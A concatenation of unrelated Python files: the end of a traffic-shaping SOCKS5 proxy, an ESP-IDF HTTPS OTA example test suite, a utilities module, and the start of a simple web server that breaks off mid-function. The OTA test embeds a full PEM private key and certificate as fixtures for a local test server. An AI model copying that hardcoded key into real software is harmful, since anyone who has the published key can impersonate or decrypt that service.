self.ip += ':'
if port_offset and connections[self.client_id]['server'] is not None:
self.port = 256 * ord(data[port_offset]) + ord(data[port_offset + 1])
if self.port:
if self.ip is None and self.hostname is not None:
if dns_cache is not None and self.hostname in dns_cache:
self.state = self.STATE_CONNECTING
cache_entry = dns_cache[self.hostname]
self.addresses = cache_entry['addresses']
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': cache_entry['localhost']})
else:
self.state = self.STATE_RESOLVING
self.SendMessage('resolve', {'hostname': self.hostname, 'port': self.port})
elif self.ip is not None:
self.state = self.STATE_CONNECTING
logging.debug('[{0:d}] Socks Connect - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.ip, self.port))
self.addresses = socket.getaddrinfo(self.ip, self.port)
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port})
else:
return
except:
pass
def handle_close(self):
global last_client_disconnected
logging.info('[{0:d}] Browser Connection Closed by browser'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'client' in connections[self.client_id]:
del connections[self.client_id]['client']
if 'server' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
if not connections:
last_client_disconnected = current_time()
logging.info('[{0:d}] Last Browser disconnected'.format(self.client_id))
except:
pass
def HandleResolved(self, message):
global dns_cache
if self.state == self.STATE_RESOLVING:
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
self.addresses = message['addresses']
if dns_cache is not None:
dns_cache[self.hostname] = {'addresses': self.addresses, 'localhost': message['localhost']}
logging.debug('[{0:d}] Resolved {1}, Connecting'.format(self.client_id, self.hostname))
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': message['localhost']})
else:
# Send host unreachable error
self.state = self.STATE_ERROR
self.buffer += chr(0x05) + chr(0x04) + self.requested_address
self.handle_write()
def HandleConnected(self, message):
if 'success' in message and self.state == self.STATE_CONNECTING:
response = chr(0x05)
if message['success']:
response += chr(0x00)
logging.debug('[{0:d}] Connected to {1}'.format(self.client_id, self.hostname))
self.state = self.STATE_CONNECTED
else:
response += chr(0x04)
self.state = self.STATE_ERROR
response += chr(0x00)
response += self.requested_address
self.buffer += response
self.handle_write()
########################################################################################################################
# stdin command processor
########################################################################################################################
class CommandProcessor():
def __init__(self):
thread = threading.Thread(target = self.run, args=())
thread.daemon = True
thread.start()
def run(self):
global must_exit
while not must_exit:
for line in iter(sys.stdin.readline, ''):
self.ProcessCommand(line.strip())
def ProcessCommand(self, input):
global in_pipe
global out_pipe
global needs_flush
global REMOVE_TCP_OVERHEAD
global port_mappings
global server
global must_exit
if len(input):
ok = False
try:
command = input.split()
if len(command) and len(command[0]):
if command[0].lower() == 'flush':
ok = True
elif command[0].lower() == 'set' and len(command) >= 3:
if command[1].lower() == 'rtt' and len(command[2]):
rtt = float(command[2])
latency = rtt / 2000.0
in_pipe.latency = latency
out_pipe.latency = latency
ok = True
elif command[1].lower() == 'inkbps' and len(command[2]):
in_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'outkbps' and len(command[2]):
out_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'mapports' and len(command[2]):
SetPortMappings(command[2])
ok = True
elif command[0].lower() == 'reset' and len(command) >= 2:
if command[1].lower() == 'rtt' or command[1].lower() == 'all':
in_pipe.latency = 0
out_pipe.latency = 0
ok = True
if command[1].lower() == 'inkbps' or command[1].lower() == 'all':
in_pipe.kbps = 0
ok = True
if command[1].lower() == 'outkbps' or command[1].lower() == 'all':
out_pipe.kbps = 0
ok = True
if command[1].lower() == 'mapports' or command[1].lower() == 'all':
port_mappings = {}
ok = True
elif command[0].lower() == 'exit':
must_exit = True
ok = True
if ok:
needs_flush = True
except:
pass
if not ok:
PrintMessage('ERROR')
# open and close a local socket which will interrupt the long polling loop to process the flush
if needs_flush:
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# Main Entry Point
########################################################################################################################
def main():
global server
global options
global in_pipe
global out_pipe
global dest_addresses
global port_mappings
global map_localhost
global dns_cache
import argparse
global REMOVE_TCP_OVERHEAD
parser = argparse.ArgumentParser(description='Traffic-shaping socks5 proxy.',
prog='tsproxy')
parser.add_argument('-v', '--verbose', action='count', help="Increase verbosity (specify multiple times for more). -vvvv for full debug output.")
parser.add_argument('--logfile', help="Write log messages to given file instead of stdout.")
parser.add_argument('-b', '--bind', default='localhost', help="Server interface address (defaults to localhost).")
parser.add_argument('-p', '--port', type=int, default=1080, help="Server port (defaults to 1080, use 0 for randomly assigned).")
parser.add_argument('-r', '--rtt', type=float, default=.0, help="Round Trip Time Latency (in ms).")
parser.add_argument('-i', '--inkbps', type=float, default=.0, help="Download Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-o', '--outkbps', type=float, default=.0, help="Upload Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-w', '--window', type=int, default=10, help="Emulated TCP initial congestion window (defaults to 10).")
parser.add_argument('-d', '--desthost', help="Redirect all outbound connections to the specified host.")
parser.add_argument('-m', '--mapports', help="Remap outbound ports. Comma-separated list of original:new with * as a wildcard. --mapports '443:8443,*:8080'")
parser.add_argument('-l', '--localhost', action='store_true', default=False,
help="Include connections already destined for localhost/127.0.0.1 in the host and port remapping.")
parser.add_argument('-n', '--nodnscache', action='store_true', default=False, help="Disable internal DNS cache.")
parser.add_argument('-f', '--flushdnscache', action='store_true', default=False, help="Automatically flush the DNS cache 500ms after the last client disconnects.")
options = parser.parse_args()
# Set up logging
log_level = logging.CRITICAL
if not options.verbose:
pass
elif options.verbose == 1:
log_level = logging.ERROR
elif options.verbose == 2:
log_level = logging.WARNING
elif options.verbose == 3:
log_level = logging.INFO
elif options.verbose >= 4:
log_level = logging.DEBUG
if options.logfile is not None:
logging.basicConfig(filename=options.logfile, level=log_level,
format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
else:
logging.basicConfig(level=log_level, format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
# Parse any port mappings
if options.mapports:
SetPortMappings(options.mapports)
if options.nodnscache:
dns_cache = None
map_localhost = options.localhost
# Resolve the address for a rewrite destination host if one was specified
if options.desthost:
logging.debug('Startup - calling getaddrinfo for {0}:{1:d}'.format(options.desthost, GetDestPort(80)))
dest_addresses = socket.getaddrinfo(options.desthost, GetDestPort(80))
# Set up the pipes. 1/2 of the latency gets applied in each direction (and /1000 to convert to seconds)
in_pipe = TSPipe(TSPipe.PIPE_IN, options.rtt / 2000.0, options.inkbps * REMOVE_TCP_OVERHEAD)
out_pipe = TSPipe(TSPipe.PIPE_OUT, options.rtt / 2000.0, options.outkbps * REMOVE_TCP_OVERHEAD)
signal.signal(signal.SIGINT, signal_handler)
server = Socks5Server(options.bind, options.port)
command_processor = CommandProcessor()
PrintMessage('Started Socks5 proxy server on {0}:{1:d}\nHit Ctrl-C to exit.'.format(server.ipaddr, server.port))
run_loop()
def signal_handler(signal, frame):
global server
global must_exit
logging.error('Exiting...')
must_exit = True
del server
# Wrapper around the asyncore loop that lets us poll the in/out pipes every 1ms
def run_loop():
global must_exit
global in_pipe
global out_pipe
global needs_flush
global flush_pipes
global last_activity
global last_client_disconnected
global dns_cache
winmm = None
# increase the windows timer resolution to 1ms
if platform.system() == "Windows":
try:
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1)
except:
pass
last_activity = current_time()
last_check = current_time()
# disable gc to avoid pauses during traffic shaping/proxying
gc.disable()
out_interval = None
in_interval = None
while not must_exit:
# Tick every 1ms if traffic-shaping is enabled and we have data or are doing background dns lookups, every 1 second otherwise
lock.acquire()
tick_interval = 0.001
if out_interval is not None:
tick_interval = max(tick_interval, out_interval)
if in_interval is not None:
tick_interval = max(tick_interval, in_interval)
if background_activity_count == 0:
if in_pipe.next_message is None and in_pipe.queue.empty() and out_pipe.next_message is None and out_pipe.queue.empty():
tick_interval = 1.0
elif in_pipe.kbps == .0 and in_pipe.latency == 0 and out_pipe.kbps == .0 and out_pipe.latency == 0:
tick_interval = 1.0
lock.release()
logging.debug("Tick Time: %0.3f", tick_interval)
asyncore.poll(tick_interval, asyncore.socket_map)
if needs_flush:
flush_pipes = True
dns_cache = {}
needs_flush = False
out_interval = out_pipe.tick()
in_interval = in_pipe.tick()
if flush_pipes:
PrintMessage('OK')
flush_pipes = False
now = current_time()
# Clear the DNS cache 500ms after the last client disconnects
if options.flushdnscache and last_client_disconnected is not None and dns_cache:
if now - last_client_disconnected >= 0.5:
dns_cache = {}
last_client_disconnected = None
logging.debug("Flushed DNS cache")
# Every 500 ms check to see if it is a good time to do a gc
if now - last_check >= 0.5:
last_check = now
# manually gc after 5 seconds of idle
if now - last_activity >= 5:
last_activity = now
logging.debug("Triggering manual GC")
gc.collect()
if winmm is not None:
winmm.timeEndPeriod(1)
def GetDestPort(port):
global port_mappings
if port_mappings is not None:
src_port = str(port)
if src_port in port_mappings:
return port_mappings[src_port]
elif 'default' in port_mappings:
return port_mappings['default']
return port
def SetPortMappings(map_string):
global port_mappings
port_mappings = {}
map_string = map_string.strip('\'" \t\r\n')
for pair in map_string.split(','):
(src, dest) = pair.split(':')
if src == '*':
port_mappings['default'] = int(dest)
logging.debug("Default port mapped to port {0}".format(dest))
else:
logging.debug("Port {0} mapped to port {1}".format(src, dest))
port_mappings[src] = int(dest)
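# Illustrative sketch (not part of the original proxy): how the port-mapping
# helpers above behave. The mapping string below is a hypothetical example.
def _example_port_mapping():
  SetPortMappings("443:8443,*:8080")
  assert GetDestPort(443) == 8443  # explicit per-port mapping
  assert GetDestPort(80) == 8080   # falls back to the '*' default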
if '__main__' == __name__:
main()
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8001))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
        # The HTTPS server runs in a daemon thread, so no explicit teardown is needed here.
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + bin_name))
dut1.write("https://" + host_ip + ":8001/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
    This test case validates OTA behaviour when the binary file is truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
    # Size of truncated file to be generated. This value can range from 288 bytes (Image header size) to the size of the original binary file
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8001/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
    This test case validates OTA behaviour when the headers of the binary file are truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
    # Size of truncated file to be generated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8001/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
    This test case validates OTA behaviour when the binary file contains random data.
    Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Random binary file to be generated
random_bin_name = "random.bin"
    # Size of random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8001/" + random_bin_name))
dut1.write("https://" + host_ip + ":8001/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
common.py
|
# -*- coding: utf-8 -*-
import json, subprocess, threading, sys, platform, os
PY3 = sys.version_info[0] == 3
JsonLoads = PY3 and json.loads or (lambda s: encJson(json.loads(s)))
JsonDumps = json.dumps
def STR2BYTES(s):
return s.encode('utf8') if PY3 else s
def BYTES2STR(b):
return b.decode('utf8') if PY3 else b
def BYTES2SYSTEMSTR(b):
return b.decode('utf8') if PY3 else \
b.decode('utf8').encode(sys.stdin.encoding)
def STR2SYSTEMSTR(s):
return s if PY3 else s.decode('utf8').encode(sys.stdin.encoding)
#def STRING_ESCAPE(s):
# if not PY3:
# return s.decode('string-escape')
# else:
# return s.encode('utf8').decode('unicode_escape')
if not PY3:
def encJson(obj):
if hasattr(obj, 'encode'):
return obj.encode('utf8')
elif isinstance(obj, list):
return [encJson(e) for e in obj]
elif isinstance(obj, dict):
return dict((encJson(k), encJson(v)) for k,v in obj.items())
else:
return obj
'''
def Partition(msg, n):
n = n * 3
if n >= len(msg):
return msg, ''
else:
# All utf8 characters start with '0xxx-xxxx' or '11xx-xxxx'
while n > 0 and ord(msg[n]) >> 6 == 2:
n -= 1
return msg[:n], msg[n:]
'''
def isSpace(b):
return b in [' ', '\t', '\n', '\r', 32, 9, 10, 13]
def Partition(msg):
if PY3:
msg = msg.encode('utf8')
n = 720
if len(msg) < n:
f, b = msg, b''
else:
for i in range(n-1, n-101, -1):
if isSpace(msg[i]):
f, b = msg[:i], msg[i:]
break
else:
f, b = msg[:n], msg[n:]
if PY3:
return f.decode('utf8'), b.decode('utf8')
else:
return f, b
#_p = re.compile(r'[0-9]+|[a-zA-Z][a-z]*')
#
#def SplitWords(s):
# return _p.findall(s)
#
#def MinusSeperate(s):
# return '-'.join(SplitWords(s)).lower()
def HasCommand(procName):
return subprocess.call(['which', procName], stdout=subprocess.PIPE) == 0
#def StartThread(target, *args, **kwargs):
# threading.Thread(target=target, args=args, kwargs=kwargs).start()
def StartDaemonThread(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class LockedValue(object):
def __init__(self, initialVal=None):
self.val = initialVal
self.lock = threading.Lock()
def setVal(self, val):
with self.lock:
self.val = val
def getVal(self):
with self.lock:
val = self.val
return val
# usage: CallInNewConsole(['python', 'qterm.py'])
def CallInNewConsole(args=None):
args = sys.argv[1:] if args is None else args
if not args:
return 1
osName = platform.system()
if osName == 'Windows':
return subprocess.call(['start'] + list(args), shell=True)
elif osName == 'Linux':
cmd = subprocess.list2cmdline(args)
if HasCommand('mate-terminal'):
args = ['mate-terminal', '-e', cmd]
elif HasCommand('gnome-terminal'):
args = ['gnome-terminal', '-e', cmd]
elif HasCommand('xterm'):
args = ['sh', '-c', 'xterm -e %s &' % cmd]
else:
return 1
# args = ['sh', '-c', 'nohup %s >/dev/null 2>&1 &' % cmd]
return subprocess.call(args, preexec_fn=os.setpgrp)
elif osName == 'Darwin':
return subprocess.call(['open','-W','-a','Terminal.app'] + list(args))
else:
return 1
# return subprocess.Popen(list(args) + ['&'])
if PY3:
import queue as Queue
else:
import Queue
class DotDict(object):
def __init__(self, **kw):
self.__dict__.update(**kw)
Pass = lambda *arg, **kwargs: None
def LeftTrim(s, head):
if s.startswith(head):
        return s[len(head):]
else:
return s
def AutoTest():
with open(sys.argv[1], 'rb') as f:
for line in f.read().split(b'\n'):
line = BYTES2SYSTEMSTR(line.strip())
if not line:
continue
elif line.startswith('#'):
print(line)
else:
print('>>> '+line)
os.system(line)
sys.stdout.write('\npress enter to continue...')
if PY3:
input()
else:
raw_input()
sys.stdout.write('\n')
if not PY3:
import HTMLParser; htmlUnescape = HTMLParser.HTMLParser().unescape
def HTMLUnescape(s):
s = s.replace(' ', ' ')
return htmlUnescape(s.decode('utf8')).encode('utf8')
else:
import html.parser; htmlUnescape = html.parser.HTMLParser().unescape
def HTMLUnescape(s):
return htmlUnescape(s.replace(' ', ' '))
def IsMainThread():
return threading.current_thread().name == 'MainThread'
if PY3:
import importlib
reload = importlib.reload
# import module / import package.module
# Import('module') / Import('package.module')
def Import(moduleName):
if moduleName in sys.modules:
reload(sys.modules[moduleName])
else:
__import__(moduleName)
return sys.modules[moduleName]
if not PY3:
import urllib
Unquote = urllib.unquote
else:
import urllib.parse
Unquote = urllib.parse.unquote
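# Illustrative usage sketch (not part of the original module): a few of the
# helpers above in action. The message text is a hypothetical example.
def _ExampleUsage():
    head, tail = Partition(u'hello world ' * 100)  # split near the 720-byte mark
    counter = LockedValue(0)
    StartDaemonThread(counter.setVal, counter.getVal() + 1)
    return head, tail, counter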
|
MyWebServer.py
|
# coding:utf-8
import socket
import re
import sys
from multiprocessing import Process
from MyWebFramework import Application
# Root directory for static HTML files
HTML_ROOT_DIR = "./html"
WSGI_PYTHON_DIR = "./wsgipython"
class HTTPServer(object):
""""""
def __init__(self, application):
"""构造函数, application指的是框架的app"""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.app = application
def start(self):
self.server_socket.listen(128)
while True:
client_socket, client_address = self.server_socket.accept()
# print("[%s, %s]用户连接上了" % (client_address[0],client_address[1]))
print("[%s, %s]用户连接上了" % client_address)
handle_client_process = Process(target=self.handle_client, args=(client_socket,))
handle_client_process.start()
client_socket.close()
def start_response(self, status, headers):
"""
status = "200 OK"
headers = [
("Content-Type", "text/plain")
]
star
"""
response_headers = "HTTP/1.1 " + status + "\r\n"
for header in headers:
response_headers += "%s: %s\r\n" % header
self.response_headers = response_headers
def handle_client(self, client_socket):
"""处理客户端请求"""
# 获取客户端请求数据
request_data = client_socket.recv(1024)
print("request data:", request_data)
request_lines = request_data.splitlines()
for line in request_lines:
print(line)
# Parse the request line, e.g. 'GET / HTTP/1.1'
request_start_line = request_lines[0]
# Extract the requested path and the HTTP method
print("*" * 10)
print(request_start_line.decode("utf-8"))
